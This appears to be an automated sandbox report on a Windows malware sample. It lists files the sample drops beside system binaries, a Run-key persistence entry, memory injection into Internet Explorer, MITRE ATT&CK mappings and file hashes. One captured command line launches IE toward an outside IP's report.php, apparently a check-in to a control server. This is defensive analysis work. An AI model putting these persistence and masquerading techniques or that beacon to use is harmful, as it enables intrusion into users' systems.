File created	C:\Windows\WinSxS\amd64_microsoft-windows-s..e-client-ui-wsreset_31bf3856ad364e35_10.0.19041.1_none_7c69077ba55f962b\WSReset.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.19041.1288_none_3f2d1be96237886e\wsmprovhost.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-wordpad_31bf3856ad364e35_10.0.19041.1_none_e3ab86b70c430b3c\wordpad.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-mdmagent_31bf3856ad364e35_10.0.19041.1266_none_b9c280a4d350d170\r\MDMAgent.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-rundll32_31bf3856ad364e35_10.0.19041.746_none_b5fe9c5c09b9d7a9\r\rundll32.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-vssservice_31bf3856ad364e35_10.0.19041.1_none_10bddbfab734fa42\VSSVC.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-a..l-systemuwplauncher_31bf3856ad364e35_10.0.19041.746_none_ed5986fc58f1b817\SystemUWPLauncher.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.19041.1202_none_4132a4047d5d53b2\AppVDllSurrogate.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-com-runtimebroker_31bf3856ad364e35_10.0.19041.746_none_744cb37f06e446cc\r\RuntimeBroker.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-gdi_31bf3856ad364e35_10.0.19041.1165_none_1ea3d2b20faf7de3\r\fontdrvhost.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-compact_31bf3856ad364e35_10.0.19041.1_none_ba3af2a08950d1cb\compact.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-gdi_31bf3856ad364e35_10.0.19041.264_none_920963acedc8777d\f\fontdrvhost.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-client-li..m-service-migration_31bf3856ad364e35_10.0.19041.84_none_8ea6a37043f4ae90\ClipUp.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-c..-disposableclientvm_31bf3856ad364e35_10.0.19041.985_none_c3639a9e3ab1a351\r\WindowsSandboxClient.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.19041.264_none_b435e08254cda322\f\printui.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-terminalservices-theme_31bf3856ad364e35_10.0.19041.746_none_b3df5aa8d99e9b89\f\TSTheme.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-security-spp_31bf3856ad364e35_10.0.19041.1266_none_8f272afdd624490f\sppsvc.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-setx_31bf3856ad364e35_10.0.19041.1_none_6267e352b86de969\setx.exe_	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-a..l-systemuwplauncher_31bf3856ad364e35_10.0.19041.1_none_c55149b3997ff9cd\SystemUWPLauncher.exe-	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000503501ac0e5b684085dc571883e44fec000000000200000000001066000000010000200000005f2bfaad46b45def6173af8875e8d52b5122c83dbbe22231cd541f28ef2a8aec000000000e800000000200002000000096beaee2ec2b61a6f944c1f660cf07a7673a50405457ac7b47375ca2a454580420000000b7efa5ca939efb05d82d7b09dcc2fbdb07b526b849113caf7bab07333ac7adc140000000e574809de2484f5cabde65f8b750102a188884c9b43b34ce4dbf7520354b2bdcefde23ab163833e2b24cec8690c0ef126a3be9722e1d305c9424581076b6c920	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31119947"	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3129159613"	IEXPLORE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c089edbb4bdada01	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3135096991"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31119947"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3129159613"	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000503501ac0e5b684085dc571883e44fec00000000020000000000106600000001000020000000e53061d40503fbea211f6e0fe4dbad77546390b6a1fede77d1742ac6f93d81cb000000000e800000000200002000000080cd9b025e0f14725f1246678b4afd6ea3dbdf2d9ee89a82c1ec4a8fb6e68fb320000000566a5e63542ae7c1c7ab7fc18aa012094e34fe49dd9aa95dc694167e85cd72dc4000000054f18a08feb791ad190e7eb74c582c209cea359db2fc5b9a3ca6cfcde19f2e4b62f509e93220df672360727cd3129e78d61ce98334a3addd9cbe7c3b262c0b60	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E6232E46-463E-11EF-81F6-56B4F41D064E} = "0"	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31119947"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c018ebbb4bdada01	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "428207118"	IEXPLORE.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5072	IEXPLORE.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
5072	IEXPLORE.exe
5072	IEXPLORE.exe
1572	IEXPLORE.EXE
1572	IEXPLORE.EXE
1572	IEXPLORE.EXE
1572	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 2080 wrote to memory of 5072	2080	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe	84
PID 2080 wrote to memory of 5072	2080	5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe	84
PID 5072 wrote to memory of 1572	5072	IEXPLORE.exe	85
PID 5072 wrote to memory of 1572	5072	IEXPLORE.exe	85
PID 5072 wrote to memory of 1572	5072	IEXPLORE.exe	85

C:\Users\Admin\AppData\Local\Temp\5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5eab0dffc5c17bce13d167e556b0b5da_JaffaCakes118.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2080
- C:\Program Files\Internet Explorer\IEXPLORE.exe
  "C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5072 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7z.exe

Filesize
893KB

MD5
f025bcb2bfabdc85d80cf9fc498a212e

SHA1
9cf7ca989ef3e0e072d7bdb6e839f2c2ef6731d3

SHA256
ef2485440b9261c158b77719b59c9e8994ec276c94935e61670c1a31dbe50a1f

SHA512
01343f950acd93b0652c1c311241bba8026a6cba0e6b6421f0f4b59042a816e2bae6d6224b85575d62136f2696a80e22f6ede8d441fa8ddabff84b87af27e218

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
22b9dbe680f4e0d81db5f64b3690eef6

SHA1
a1ab04a2fe8fcd962431b3202e61cb4127097c2a

SHA256
15bdcde215cc325d5745d5af509c7cce6199e10b13330e41e749275de6a0a15d

SHA512
6c40d8810a9ef52a552529b59d2a401c2ef3af1a57ddbf03d373168b14a76b26953499ae999b925d8847e9997b284b192ede8326e0b130e2ea62dd1b3c40ecf4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
fc50ee7251eaaf86d02d11adccd73cbf

SHA1
465ab18c5be10f11b189d40b695227d69f49207e

SHA256
7ccb4103aa88fbe9b1d08ca5de0826a7b56b5276f2cae8e58b40011f815d0450

SHA512
b1ac8a367756ac95e5814db769ba927ab23f8b2fffbdd4ee48c6cf0b106bc181a28801fddb87d2da9590eafc7b06eeea18547328aa52641ea8b7e7a64efce761

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\Q90VG4IN\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
memory/2080-0-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/2080-8574-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads